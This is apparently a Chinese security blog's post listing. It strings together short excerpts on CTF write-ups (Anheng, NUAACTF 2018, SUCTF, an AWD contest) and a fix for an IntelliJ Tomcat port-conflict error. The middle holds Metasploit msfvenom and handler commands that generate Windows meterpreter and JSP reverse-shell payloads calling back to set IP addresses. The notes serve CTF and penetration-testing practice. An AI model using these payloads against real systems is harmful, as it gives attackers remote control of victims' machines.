安恒1月月赛复现wp
安恒1月月赛
(Feb 24 2019) 7 minutes read (About 1074 words)
安恒1月月赛复现wp
文章首发于安全客,地址:https://www.anquanke.com/post/id/170708
过年前做了一下,感觉还是挺有意思的。比赛官方也开源了比赛源码。
本文首发于补天平台,地址:https://mp.weixin.qq.com/s/Hm6TiLHiAygrJr-MGRq9Mw
在NUAACTF_2018中,我出了一道比较水的采用Spring框架的SSRF+Java Deserialization+Command Injection。个人觉得在出题时候也学习到了不少知识,特别是在Command Injection这一块让我对Command Injection有了新的看法。
NUAACTF 2018 writeup
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.173.8 LPORT=8888 –platform windows -f exe > /root/Desktop/test.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=10.11.173.8 LPORT=8888 X > /root/Desktop/test.exe
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 172.16.71.131
set lport 80
msfvenom -p java/jsp_shell_reverse_tcp -f jsp LHOST=172.26.171.77 LPORT=8888 -o /root/Desktop/test.jsp
use exploit/multi/handler
route add 211.65.110.10 255.255.255.255
这次比赛在赛前看规则我觉得还挺有意思的,毕竟是采用一种新的AWD形式,Web方面采用的是正则配waf的形式去防御,然后当初给@Mio师傅看的时候,他表示也挺想来的。可惜他们学校没报销就没来了。这次就写写这两天的比赛经验吧。
SUCTF五校联合招新赛已经过去几天了。现在从主办方的角度来写写我第一次办比赛整个过程吧…
首先本次比赛是江苏高校信息安全联盟SU内东南大学、南京航空航天大学、南京理工大学、三江学院、金陵科技学院五校联合举办的队内招新赛,原本计划是出题给萌新做的,结果到后面是题目越来越难2333…感觉内部出题也形成了一定的竞争,然后结果就不提了,变成了大佬屠榜赛。
很久不用idea了,突然用idea启动一个tomcat的java web项目,结果一直提示
1 | Address localhost:1099 already in use |
自己通过
1 | lsof -i :1099 |
并没有发现端口占用,重装了idea、tomcat都不行,换了一个已经确认是没有占用的端口也还是不行。
经过各种搜索途径找到的都是检查端口占用,再把占用端口的进程关掉即可;或者又是换另一个端口。
对于我这种情况都是无济于事。最后解决方案参考了记一次Mac IntelliJ中Tomcat崩溃的怪异现象(分析与解读)
这里直接提解决方法,就是在/etc/hosts下编辑增加
1 | 127.0.0.1 localhost |
这个问题就可以得到解决
如果还有提示cannot run program '/path/to/tomcat/bin/catalina.sh' error=13 permission denied的错误,检查相关文件的权限,这里我是因为重新下载了tomcat导致catalina.sh没有运行的权限,加上以后即可成功运行。